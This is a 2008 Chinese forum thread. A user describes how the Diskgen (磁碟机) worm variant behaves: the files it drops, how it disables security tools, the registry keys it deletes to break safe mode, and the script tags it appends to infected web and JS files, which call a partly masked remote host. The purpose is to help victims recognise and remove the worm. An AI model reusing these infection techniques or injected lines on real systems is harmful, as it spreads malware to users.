找回密码
 注册
搜索
热搜: 超星 读书 找书
查看: 1852|回复: 3

[【学术茶座】] 再说Worm.Win32.Diskgen.gen新磁碟机变种病毒

[复制链接]
发表于 2008-5-30 11:49:12 | 显示全部楼层 |阅读模式
首先说明我在其它论坛发过此帖,如果版主搜到,那是我发的
1.病毒运行后,生成如下文件
C:\\WINDOWS\\system32\\Com\\LSASS.EXE
C:\\WINDOWS\\system32\\Com\\netcfg.000
C:\\WINDOWS\\system32\\Com\\netcfg.dll
C:\\WINDOWS\\system32\\Com\\SMSS.EXE
C:\\WINDOWS\\system32\\894729.log
C:\\WINDOWS\\system32\\dnsq.dll
C:\\WINDOWS\\system32\\ntfsus.exe
C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\~.exe
或者在C:\\Documents and Settings\\用户名\\「开始」菜单\\程序\\启动下面

netcfg.dll负责注入IE并连接网络下载木马
并注册为浏览器加载项
[IfObj Control]
{D9901239-34A2-448D-A000-3705544ECE9D} <C:\\WINDOWS\\system32\\com\\netcfg.dll, 506>

dnsq.dll会插入一些进程,并监控C:\\WINDOWS\\system32\\Com\\LSASS.EXE,如果该进程被结束,则立即恢复。
而且会监控~.exe,如果该文件被删除,立即重写。

894729.log即pagefile.pif文件
之中还会在C盘生成一个驱动,该驱动应该是用于提升权限所用
各个盘下面生成pagefile.pif和autorun.inf

2.通过查找窗口文字和和获得窗口线程进程ID等函数(GetWindowThreadProcessID)监控指定文字的窗口,之后会发送消息关闭窗口或者通过Terminate process函数结束进程,最终的结果是很多安全工具和杀毒软件不能使用,包括我们常用的sreng,Icesword以及Icesword修改版...

3.以独占方式禁止读取各盘下面的根目录下面的pagefile.pif,autorun.inf,C:\\boot.ini,C:\\Windows\\system32\\drivers\\hosts
C:\\boot.ini不能写则Xdelbox等软件被废掉。

4.破坏安全模式
删除如下键
HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Safer(和安全模式有关?)
HKLM\\SYSTEM\\ControlSet001\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\\SYSTEM\\ControlSet001\\Control\\SafeBoot\\Network\\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\{4D36E967-E325-11CE-BFC1-08002BE10318}

5.删除HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run键

6.破坏显示隐藏文件
HKU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden改为0x00000000

7.感染非系统分区下面部分exe文件和rar,zip压缩包内的exe文件

8.感染非系统分区下面的htm,html等网页文件
在其尾部加入<script src=\"http://%6A%73%2E%6******B%1%30%32%2E%63%6F%6D/*\"></script>的代码
感染js等脚本文件
在其尾部加入document.write(\"<ScRiPt src=http://%6A%73%**31%30%32%2E%63%6F6D/*></sCrIpT>\");的代码

这个毒很厉害,从落雪到威金,现在是它,所有的杀毒软件都被搞死,sre、windows清理助手、冰仞也都被搞死,我用木马清道夫2008,能查出来毒,杀掉一部分后(另一部分杀不动),会死灰复燃。
用瑞星那个专杀要先查杀一下全盘,残留文件用gmer杀。。。

想想今年春节被这个病毒折腾够呛,现在大家应该都知道怎么杀了吧?感慨这个病毒给无数像我这样的菜鸟带来的无数的烦恼,再把它修改系统的地方贴上来,供大家参考!
回复

使用道具 举报

发表于 2008-5-30 11:56:40 | 显示全部楼层
学习一下,谢谢指导!!!!!!!!
回复

使用道具 举报

发表于 2008-5-30 14:53:27 | 显示全部楼层
关于磁碟机病毒,通过瑞星是可以直接删除掉的。磁碟机病毒刚出来那会,确实是恐怖,每次去打印店打印东西,u盘都会被感染,当时有一种“怕狼怕虎”的感觉,甚至有不再去打印店打印东西的想法,以绝后患嘛,嘿嘿,现在不用怕了,一般杀毒软件都能把它“搞定”!
回复

使用道具 举报

发表于 2008-5-30 16:49:39 | 显示全部楼层
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|网上读书园地

GMT+8, 2024-5-23 10:55 , Processed in 0.536901 second(s), 5 queries , Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表